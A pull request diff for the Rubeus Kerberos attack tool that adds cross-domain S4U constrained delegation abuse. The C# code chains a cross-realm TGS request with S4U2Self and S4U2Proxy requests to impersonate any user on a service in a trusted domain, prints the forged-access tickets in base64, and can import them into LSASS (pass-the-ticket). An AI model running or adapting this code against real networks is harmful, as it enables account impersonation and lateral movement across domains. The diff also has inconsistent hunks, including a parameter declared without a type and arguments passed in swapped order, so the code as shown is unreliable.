### PR TITLE
Cross Domain S4U

### DIFF
--- a/Rubeus/Commands/S4u.cs
+++ b/Rubeus/Commands/S4u.cs
@@ -19,6 +19,8 @@ namespace Rubeus.Commands
             string outfile = "";
             bool ptt = false;
             string dc = "";
+            string targetDomain = "";
+            string targetDC = "";
             Interop.KERB_ETYPE encType = Interop.KERB_ETYPE.subkey_keymaterial; // throwaway placeholder, changed to something valid
             KRB_CRED tgs = null;
 
@@ -65,6 +67,14 @@ namespace Rubeus.Commands
                     return;
                 }
                 targetUser = arguments["/impersonateuser"];
+            }
+            if (arguments.ContainsKey("/targetdomain"))
+            {
+                targetDomain = arguments["/targetdomain"];
+            }
+            if (arguments.ContainsKey("/targetdc"))
+            {
+                targetDC = arguments["/targetdc"];
             }
             if (arguments.ContainsKey("/outfile"))
             {
@@ -128,13 +138,13 @@ namespace Rubeus.Commands
                 {
                     byte[] kirbiBytes = Convert.FromBase64String(kirbi64);
                     KRB_CRED kirbi = new KRB_CRED(kirbiBytes);
-                    S4U.Execute(kirbi, targetUser, targetSPN, outfile, ptt, dc, altSname, tgs);
+                    S4U.Execute(kirbi, targetUser, targetSPN, outfile, ptt, dc, altSname, tgs, targetDomain, targetDC);
                 }
                 else if (File.Exists(kirbi64))
                 {
                     byte[] kirbiBytes = File.ReadAllBytes(kirbi64);
                     KRB_CRED kirbi = new KRB_CRED(kirbiBytes);
-                    S4U.Execute(kirbi, targetUser, targetSPN, outfile, ptt, dc, altSname, tgs);
+                    S4U.Execute(kirbi, targetUser, targetSPN, outfile, ptt, dc, altSname, tgs, targetDomain, targetDC);
                 }
                 else
                 {
@@ -154,7 +164,7 @@ namespace Rubeus.Commands
                     return;
                 }
 
-                S4U.Execute(user, domain, hash, encType, targetUser, targetSPN, outfile, ptt, dc, altSname, tgs);
+                S4U.Execute(user, domain, hash, encType, targetUser, targetSPN, outfile, ptt, dc, altSname, tgs, targetDomain, targetDC);
                 return;
             }
             else

--- a/Rubeus/lib/S4U.cs
+++ b/Rubeus/lib/S4U.cs
@@ -28,7 +28,7 @@ namespace Rubeus
             // execute the s4u process
             Execute(kirbi, targetUser, targetSPN, outfile, ptt, domainController, altService, tgs, targetDomainController, targetDomain);
         }
-        public static void Execute(KRB_CRED kirbi, string targetUser, string targetSPN = "", string outfile = "", bool ptt = false, string domainController = "", string altService = "", KRB_CRED tgs = null, targetDomainController = "", string targetDomain = "")
+        public static void Execute(KRB_CRED kirbi, string targetUser, string targetSPN = "", string outfile = "", bool ptt = false, string domainController = "", string altService = "", KRB_CRED tgs = null, string targetDomainController = "", string targetDomain = "")
         {
             Console.WriteLine("[*] Action: S4U\r\n");
 

--- a/Rubeus/lib/S4U.cs
+++ b/Rubeus/lib/S4U.cs
@@ -7,7 +7,7 @@ namespace Rubeus
 {
     public class S4U
     {
-        public static void Execute(string userName, string domain, string keyString, Interop.KERB_ETYPE etype, string targetUser, string targetSPN = "", string outfile = "", bool ptt = false, string domainController = "", string altService = "", KRB_CRED tgs = null)
+        public static void Execute(string userName, string domain, string keyString, Interop.KERB_ETYPE etype, string targetUser, string targetSPN = "", string outfile = "", bool ptt = false, string domainController = "", string altService = "", KRB_CRED tgs = null, string targetDomainController = "", string targetDomain = "")
         {
             // first retrieve a TGT for the user
             byte[] kirbiBytes = Ask.TGT(userName, domain, keyString, etype, null, false, domainController, new Interop.LUID());

--- a/Rubeus/lib/S4U.cs
+++ b/Rubeus/lib/S4U.cs
@@ -26,23 +26,33 @@ namespace Rubeus
             KRB_CRED kirbi = new KRB_CRED(kirbiBytes);
 
             // execute the s4u process
-            Execute(kirbi, targetUser, targetSPN, outfile, ptt, domainController, altService, tgs);
+            Execute(kirbi, targetUser, targetSPN, outfile, ptt, domainController, altService, tgs, targetDomainController, targetDomain);
         }
-        public static void Execute(KRB_CRED kirbi, string targetUser, string targetSPN = "", string outfile = "", bool ptt = false, string domainController = "", string altService = "", KRB_CRED tgs = null)
+        public static void Execute(KRB_CRED kirbi, string targetUser, string targetSPN = "", string outfile = "", bool ptt = false, string domainController = "", string altService = "", KRB_CRED tgs = null, targetDomainController = "", string targetDomain = "")
         {
             Console.WriteLine("[*] Action: S4U\r\n");
 
-            if (tgs != null && String.IsNullOrEmpty(targetSPN) == false)
+            if (!String.IsNullOrEmpty(targetDomain) && !String.IsNullOrEmpty(targetDomainController))
             {
-                Console.WriteLine("[*] Loaded a TGS for {0}\\{1}", tgs.enc_part.ticket_info[0].prealm, tgs.enc_part.ticket_info[0].pname.name_string[0]);
-                S4U2Proxy(kirbi, targetUser, targetSPN, outfile, ptt, domainController, altService, tgs.tickets[0]);
+                // do cross domain S4U
+                // no support for supplying a TGS due to requiring more than a single ticket
+                Console.WriteLine("[*] Performing cross domain constrained delegation");
+                CrossDomainS4U(kirbi, targetUser, targetSPN, ptt, domainController, altService, targetDomain, targetDomainController);
             }
             else
             {
-                Ticket self = S4U2Self(kirbi, targetUser, targetSPN, outfile, ptt, domainController, altService);
-                if (String.IsNullOrEmpty(targetSPN) == false)
+                if (tgs != null && String.IsNullOrEmpty(targetSPN) == false)
                 {
-                    S4U2Proxy(kirbi, targetUser, targetSPN, outfile, ptt, domainController, altService, self);
+                    Console.WriteLine("[*] Loaded a TGS for {0}\\{1}", tgs.enc_part.ticket_info[0].prealm, tgs.enc_part.ticket_info[0].pname.name_string[0]);
+                    S4U2Proxy(kirbi, targetUser, targetSPN, outfile, ptt, domainController, altService, tgs.tickets[0]);
+                }
+                else
+                {
+                    Ticket self = S4U2Self(kirbi, targetUser, targetSPN, outfile, ptt, domainController, altService);
+                    if (String.IsNullOrEmpty(targetSPN) == false)
+                    {
+                        S4U2Proxy(kirbi, targetUser, targetSPN, outfile, ptt, domainController, altService, self);
+                    }
                 }
             }
         }
@@ -431,6 +441,416 @@ namespace Rubeus
             }
 
             return null;
+        }
+
+        private static void CrossDomainS4U(KRB_CRED kirbi, string targetUser, string targetSPN, bool ptt, string domainController = "", string altService = "", string targetDomainController = "", string targetDomain = "")
+        {
+            // extract out the info needed for the TGS-REQ/S4U2Self execution
+            string userName = kirbi.enc_part.ticket_info[0].pname.name_string[0];
+            string domain = kirbi.enc_part.ticket_info[0].prealm;
+            Ticket ticket = kirbi.tickets[0];
+            byte[] clientKey = kirbi.enc_part.ticket_info[0].key.keyvalue;
+            Interop.KERB_ETYPE etype = (Interop.KERB_ETYPE)kirbi.enc_part.ticket_info[0].key.keytype;
+
+            // First retrieve our service ticket for the target domains KRBTGT from our DC
+            Console.WriteLine("[*] Retrieving TGS from {0} for foreign domain, {1}, KRBTGT service", domain, targetDomain);
+            KRB_CRED crossTGS = CrossDomainKRBTGT(userName, domain, domainController, targetDomain, ticket, clientKey, etype, Interop.KERB_ETYPE.subkey_keymaterial);
+            Interop.KERB_ETYPE crossEtype = (Interop.KERB_ETYPE)crossTGS.enc_part.ticket_info[0].key.keytype;
+            byte[] crossKey = crossTGS.enc_part.ticket_info[0].key.keyvalue;
+
+            // Next retrieve an S4U2Self from the target domains DC
+            // to be used when we ask for a S4U2Self from our DC
+            // We need to use our TGS for the target domains KRBTGT for this
+            Console.WriteLine("[*] Performing cross domain S4U2Self from {0} to {1}", domain, targetDomain);
+            KRB_CRED foreignSelf = CrossDomainS4U2Self(string.Format("{0}@{1}", userName, domain), string.Format("{0}@{1}", targetUser, targetDomain), targetDomainController, crossTGS.tickets[0], crossKey, crossEtype, Interop.KERB_ETYPE.subkey_keymaterial);
+            crossEtype = (Interop.KERB_ETYPE)foreignSelf.enc_part.ticket_info[0].key.keytype;
+            crossKey = foreignSelf.enc_part.ticket_info[0].key.keyvalue;
+
+            // Now retrieve an S4U2Self from our DC
+            // We use the foreign S4U2Self TGS to ask for this
+            KRB_CRED localSelf = CrossDomainS4U2Self(string.Format("{0}@{1}", userName, domain), string.Format("{0}@{1}", targetUser, targetDomain), domainController, foreignSelf.tickets[0], crossKey, crossEtype, Interop.KERB_ETYPE.subkey_keymaterial, false);
+
+            // Using our standard TGT and attaching our local S4U2Self
+            // retrieve an S4U2Proxy from our DC
+            // This will be needed for the last request
+            KRB_CRED localS4U2Proxy = CrossDomainS4U2Proxy(string.Format("{0}@{1}", userName, domain), string.Format("{0}@{1}", targetUser, targetDomain), targetSPN, domainController, ticket, clientKey, etype, Interop.KERB_ETYPE.subkey_keymaterial, localSelf.tickets[0], false);
+            crossEtype = (Interop.KERB_ETYPE)crossTGS.enc_part.ticket_info[0].key.keytype;
+            crossKey = crossTGS.enc_part.ticket_info[0].key.keyvalue;
+
+            // Lastly retrieve the final S4U2Proxy from the foreign domains DC
+            // This is the service ticket we need to access the target service
+            KRB_CRED foreignS4U2Proxy = CrossDomainS4U2Proxy(string.Format("{0}@{1}", userName, domain), string.Format("{0}@{1}", targetUser, targetDomain), targetSPN, targetDomainController, crossTGS.tickets[0], crossKey, crossEtype, Interop.KERB_ETYPE.subkey_keymaterial, localS4U2Proxy.tickets[0], true, ptt);
+        }
+
+        private static KRB_CRED CrossDomainKRBTGT(string userName, string domain, string domainController, string targetDomain, Ticket ticket, byte[] clientKey, Interop.KERB_ETYPE etype, Interop.KERB_ETYPE requestEType)
+        {
+            // die if can't get IP of DC
+            string dcIP = Networking.GetDCIP(domainController);
+            if (String.IsNullOrEmpty(dcIP)) { return null; }
+
+            Console.WriteLine("[*] Requesting the cross realm 'TGS' for {0} from {1}", targetDomain, domainController);
+            byte[] tgsBytes = TGS_REQ.NewTGSReq(userName, domain, targetDomain, ticket, clientKey, etype, requestEType);
+
+            Console.WriteLine("[*] Sending cross realm TGS request");
+            byte[] response = Networking.SendBytes(dcIP, 88, tgsBytes);
+            if (response == null)
+            {
+                return null;
+            }
+
+            // decode the supplied bytes to an AsnElt object
+            //  false == ignore trailing garbage
+            AsnElt responseAsn = AsnElt.Decode(response, false);
+
+            // check the response value
+            int responseTag = responseAsn.TagValue;
+
+            if (responseTag == 13)
+            {
+                Console.WriteLine("[+] cross realm TGS success!");
+
+                // parse the response to an TGS-REP
+                TGS_REP rep = new TGS_REP(responseAsn);
+                // KRB_KEY_USAGE_TGS_REP_EP_SESSION_KEY = 8
+                byte[] outBytes = Crypto.KerberosDecrypt(etype, Interop.KRB_KEY_USAGE_TGS_REP_EP_SESSION_KEY, clientKey, rep.enc_part.cipher);
+                AsnElt ae = AsnElt.Decode(outBytes, false);
+                EncKDCRepPart encRepPart = new EncKDCRepPart(ae.Sub[0]);
+
+                // now build the final KRB-CRED structure
+                KRB_CRED cred = new KRB_CRED();
+
+                // add the ticket
+                cred.tickets.Add(rep.ticket);
+
+                // build the EncKrbCredPart/KrbCredInfo parts from the ticket and the data in the encRepPart
+
+                KrbCredInfo info = new KrbCredInfo();
+
+                // [0] add in the session key
+                info.key.keytype = encRepPart.key.keytype;
+                info.key.keyvalue = encRepPart.key.keyvalue;
+
+                // [1] prealm (domain)
+                info.prealm = encRepPart.realm;
+
+                // [2] pname (user)
+                info.pname.name_type = rep.cname.name_type;
+                info.pname.name_string = rep.cname.name_string;
+
+                // [3] flags
+                info.flags = encRepPart.flags;
+
+                // [4] authtime (not required)
+
+                // [5] starttime
+                info.starttime = encRepPart.starttime;
+
+                // [6] endtime
+                info.endtime = encRepPart.endtime;
+
+                // [7] renew-till
+                info.renew_till = encRepPart.renew_till;
+
+                // [8] srealm
+                info.srealm = encRepPart.realm;
+
+                // [9] sname
+                info.sname.name_type = encRepPart.sname.name_type;
+                info.sname.name_string = encRepPart.sname.name_string;
+
+                // add the ticket_info into the cred object
+                cred.enc_part.ticket_info.Add(info);
+
+                byte[] kirbiBytes = cred.Encode().Encode();
+
+                PrintTicket(kirbiBytes, "base64(ticket.kirbi)");
+
+                KRB_CRED kirbi = new KRB_CRED(kirbiBytes);
+
+                return kirbi;
+            }
+            else if (responseTag == 30)
+            {
+                // parse the response to an KRB-ERROR
+                KRB_ERROR error = new KRB_ERROR(responseAsn.Sub[0]);
+                Console.WriteLine("\r\n[X] KRB-ERROR ({0}) : {1}\r\n", error.error_code, (Interop.KERBEROS_ERROR)error.error_code);
+            }
+            else
+            {
+                Console.WriteLine("\r\n[X] Unknown application tag: {0}", responseTag);
+            }
+            return null;
+        }
+
+        // to perform the 2 S4U2Self requests
+        private static KRB_CRED CrossDomainS4U2Self(string userName, string targetUser, string targetDomainController, Ticket ticket, byte[] clientKey, Interop.KERB_ETYPE etype, Interop.KERB_ETYPE requestEType, bool cross = true)
+        {
+            // die if can't get IP of DC
+            string dcIP = Networking.GetDCIP(targetDomainController);
+            if (String.IsNullOrEmpty(dcIP)) { return null; }
+
+            Console.WriteLine("[*] Requesting the cross realm 'S4U2Self' for {0} from {1}", targetUser, targetDomainController);
+            byte[] tgsBytes = TGS_REQ.NewTGSReq(userName, targetUser, ticket, clientKey, etype, requestEType, cross);
+
+            Console.WriteLine("[*] Sending cross realm S4U2Self request");
+            byte[] response = Networking.SendBytes(dcIP, 88, tgsBytes);
+            if (response == null)
+            {
+                return null;
+            }
+
+            // decode the supplied bytes to an AsnElt object
+            //  false == ignore trailing garbage
+            AsnElt responseAsn = AsnElt.Decode(response, false);
+
+            // check the response value
+            int responseTag = responseAsn.TagValue;
+
+            if (responseTag == 13)
+            {
+                Console.WriteLine("[+] cross realm S4U2Self success!");
+
+                // parse the response to an TGS-REP
+                TGS_REP rep = new TGS_REP(responseAsn);
+                // KRB_KEY_USAGE_TGS_REP_EP_SESSION_KEY = 8
+                byte[] outBytes = Crypto.KerberosDecrypt(etype, Interop.KRB_KEY_USAGE_TGS_REP_EP_SESSION_KEY, clientKey, rep.enc_part.cipher);
+                AsnElt ae = AsnElt.Decode(outBytes, false);
+                EncKDCRepPart encRepPart = new EncKDCRepPart(ae.Sub[0]);
+
+                // now build the final KRB-CRED structure
+                KRB_CRED cred = new KRB_CRED();
+
+                // add the ticket
+                cred.tickets.Add(rep.ticket);
+
+                // build the EncKrbCredPart/KrbCredInfo parts from the ticket and the data in the encRepPart
+
+                KrbCredInfo info = new KrbCredInfo();
+
+                // [0] add in the session key
+                info.key.keytype = encRepPart.key.keytype;
+                info.key.keyvalue = encRepPart.key.keyvalue;
+
+                // [1] prealm (domain)
+                info.prealm = encRepPart.realm;
+
+                // [2] pname (user)
+                info.pname.name_type = rep.cname.name_type;
+                info.pname.name_string = rep.cname.name_string;
+
+                // [3] flags
+                info.flags = encRepPart.flags;
+
+                // [4] authtime (not required)
+
+                // [5] starttime
+                info.starttime = encRepPart.starttime;
+
+                // [6] endtime
+                info.endtime = encRepPart.endtime;
+
+                // [7] renew-till
+                info.renew_till = encRepPart.renew_till;
+
+                // [8] srealm
+                info.srealm = encRepPart.realm;
+
+                // [9] sname
+                info.sname.name_type = encRepPart.sname.name_type;
+                info.sname.name_string = encRepPart.sname.name_string;
+
+                // add the ticket_info into the cred object
+                cred.enc_part.ticket_info.Add(info);
+
+                byte[] kirbiBytes = cred.Encode().Encode();
+
+                PrintTicket(kirbiBytes, "base64(ticket.kirbi)");
+
+                KRB_CRED kirbi = new KRB_CRED(kirbiBytes);
+
+                return kirbi;
+            }
+            else if (responseTag == 30)
+            {
+                // parse the response to an KRB-ERROR
+                KRB_ERROR error = new KRB_ERROR(responseAsn.Sub[0]);
+                Console.WriteLine("\r\n[X] KRB-ERROR ({0}) : {1}\r\n", error.error_code, (Interop.KERBEROS_ERROR)error.error_code);
+            }
+            else
+            {
+                Console.WriteLine("\r\n[X] Unknown application tag: {0}", responseTag);
+            }
+            return null;
+        }
+
+        // to perform the 2 S4U2Proxy requests
+        private static KRB_CRED CrossDomainS4U2Proxy(string userName, string targetUser, string targetSPN, string targetDomainController, Ticket ticket, byte[] clientKey, Interop.KERB_ETYPE etype, Interop.KERB_ETYPE requestEType, Ticket tgs = null, bool cross = true, bool ptt = false)
+        {
+            string dcIP = Networking.GetDCIP(targetDomainController);
+            if (String.IsNullOrEmpty(dcIP)) { return null; }
+
+            string domain = userName.Split('@')[1];
+            string targetDomain = targetUser.Split('@')[1];
+
+            Console.WriteLine("[*] Building S4U2proxy request for service: '{0}' on {1}", targetSPN, targetDomainController);
+            TGS_REQ s4u2proxyReq = new TGS_REQ(cname: false);
+            PA_DATA padata = new PA_DATA(domain, userName.Split('@')[0], ticket, clientKey, etype);
+            s4u2proxyReq.padata.Add(padata);
+            PA_DATA pac_options = new PA_DATA(false, false, false, true);
+            s4u2proxyReq.padata.Add(pac_options);
+
+            s4u2proxyReq.req_body.kdcOptions = s4u2proxyReq.req_body.kdcOptions | Interop.KdcOptions.CNAMEINADDLTKT;
+            s4u2proxyReq.req_body.kdcOptions = s4u2proxyReq.req_body.kdcOptions | Interop.KdcOptions.CANONICALIZE;
+            s4u2proxyReq.req_body.kdcOptions = s4u2proxyReq.req_body.kdcOptions & ~Interop.KdcOptions.RENEWABLEOK;
+
+            if (cross)
+            {
+                s4u2proxyReq.req_body.realm = targetDomain;
+            }
+            else
+            {
+                s4u2proxyReq.req_body.realm = domain;
+            }
+
+            string[] parts = targetSPN.Split('/');
+            string serverName = parts[parts.Length - 1];
+
+            s4u2proxyReq.req_body.sname.name_type = 2;
+            foreach (string part in parts)
+            {
+                s4u2proxyReq.req_body.sname.name_string.Add(part);
+            }
+
+            // supported encryption types
+            s4u2proxyReq.req_body.etypes.Add(Interop.KERB_ETYPE.aes128_cts_hmac_sha1);
+            s4u2proxyReq.req_body.etypes.Add(Interop.KERB_ETYPE.aes256_cts_hmac_sha1);
+            s4u2proxyReq.req_body.etypes.Add(Interop.KERB_ETYPE.rc4_hmac);
+
+            // add in the ticket from the S4U2self response
+            s4u2proxyReq.req_body.additional_tickets.Add(tgs);
+
+            byte[] s4ubytes = s4u2proxyReq.Encode().Encode();
+
+            Console.WriteLine("[*] Sending S4U2proxy request");
+            byte[] response2 = Networking.SendBytes(dcIP, 88, s4ubytes);
+            if (response2 == null)
+            {
+                return null;
+            }
+
+            // decode the supplied bytes to an AsnElt object
+            //  false == ignore trailing garbage
+            AsnElt responseAsn = AsnElt.Decode(response2, false);
+
+            // check the response value
+            int responseTag = responseAsn.TagValue;
+
+            if (responseTag == 13)
+            {
+                Console.WriteLine("[+] S4U2proxy success!");
+
+                // parse the response to an TGS-REP
+                TGS_REP rep2 = new TGS_REP(responseAsn);
+
+                // https://github.com/gentilkiwi/kekeo/blob/master/modules/asn1/kull_m_kerberos_asn1.h#L62
+                byte[] outBytes2 = Crypto.KerberosDecrypt(etype, 8, clientKey, rep2.enc_part.cipher);
+                AsnElt ae2 = AsnElt.Decode(outBytes2, false);
+                EncKDCRepPart encRepPart2 = new EncKDCRepPart(ae2.Sub[0]);
+
+                // now build the final KRB-CRED structure, no alternate snames
+                KRB_CRED cred = new KRB_CRED();
+
+                // add the ticket
+                cred.tickets.Add(rep2.ticket);
+
+                // build the EncKrbCredPart/KrbCredInfo parts from the ticket and the data in the encRepPart
+
+                KrbCredInfo info = new KrbCredInfo();
+
+                // [0] add in the session key
+                info.key.keytype = encRepPart2.key.keytype;
+                info.key.keyvalue = encRepPart2.key.keyvalue;
+
+                // [1] prealm (domain)
+                info.prealm = encRepPart2.realm;
+
+                // [2] pname (user)
+                info.pname.name_type = rep2.cname.name_type;
+                    info.pname.name_string = rep2.cname.name_string;
+
+                // [3] flags
+                info.flags = encRepPart2.flags;
+
+                // [4] authtime (not required)
+
+                // [5] starttime
+                info.starttime = encRepPart2.starttime;
+
+                // [6] endtime
+                info.endtime = encRepPart2.endtime;
+
+                // [7] renew-till
+                info.renew_till = encRepPart2.renew_till;
+
+                // [8] srealm
+                info.srealm = encRepPart2.realm;
+
+                // [9] sname
+                info.sname.name_type = encRepPart2.sname.name_type;
+                info.sname.name_string = encRepPart2.sname.name_string;
+
+                // add the ticket_info into the cred object
+                cred.enc_part.ticket_info.Add(info);
+
+                byte[] kirbiBytes = cred.Encode().Encode();
+
+                string kirbiString = Convert.ToBase64String(kirbiBytes);
+
+                Console.WriteLine("[*] base64(ticket.kirbi) for SPN '{0}':\r\n", targetSPN);
+
+                // display the .kirbi base64, columns of 80 chararacters
+                foreach (string line in Helpers.Split(kirbiString, 80))
+                {
+                    Console.WriteLine("      {0}", line);
+                }
+                Console.WriteLine("");
+                if (ptt && cross)
+                {
+                    // pass-the-ticket -> import into LSASS
+                    LSA.ImportTicket(kirbiBytes, new Interop.LUID());
+                }
+
+                KRB_CRED kirbi = new KRB_CRED(kirbiBytes);
+
+                return kirbi;
+            }
+            else if (responseTag == 30)
+            {
+                // parse the response to an KRB-ERROR
+                KRB_ERROR error = new KRB_ERROR(responseAsn.Sub[0]);
+                Console.WriteLine("\r\n[X] KRB-ERROR ({0}) : {1}\r\n", error.error_code, (Interop.KERBEROS_ERROR)error.error_code);
+            }
+            else
+            {
+                Console.WriteLine("\r\n[X] Unknown application tag: {0}", responseTag);
+            }
+
+            return null;
+        }
+
+        // added little function to print tickets because it seemed to make sense at the time :-)
+        private static void PrintTicket(byte[] kirbiBytes, string message)
+        {
+            string kirbiString = Convert.ToBase64String(kirbiBytes);
+
+            Console.WriteLine("[*] {0}:\r\n", message);
+
+            // display the .kirbi base64, columns of 80 chararacters
+            foreach (string line in Helpers.Split(kirbiString, 80))
+            {
+                Console.WriteLine("      {0}", line);
+            }
+            Console.WriteLine("");
         }
     }
 }

--- a/Rubeus/lib/krb_structures/KDC_REQ_BODY.cs
+++ b/Rubeus/lib/krb_structures/KDC_REQ_BODY.cs
@@ -28,12 +28,18 @@ namespace Rubeus
         //                                            -- NOTE: not empty
         //}
 
-        public KDCReqBody()
+        public KDCReqBody(bool c = true)
         {
             // defaults for creation
             kdcOptions = Interop.KdcOptions.FORWARDABLE | Interop.KdcOptions.RENEWABLE | Interop.KdcOptions.RENEWABLEOK;
 
-            cname = new PrincipalName();
+            // added ability to remove cname from request
+            // seems to be useful for cross domain stuff
+            // didn't see a cname in "real" S4U request traffic
+            if (c)
+            {
+                cname = new PrincipalName();
+            }
 
             sname = new PrincipalName();
 


### PR DESCRIPTION
Added support for cross domain S4U, code probably leaves a lot to be desired (much copied from other parts of the code) but works for intra-forest trusts.

Added enough comments so it should be clear how it works.

Requires /targetdomain and /targetdc options to be passed, otherwise standard S4U is performed.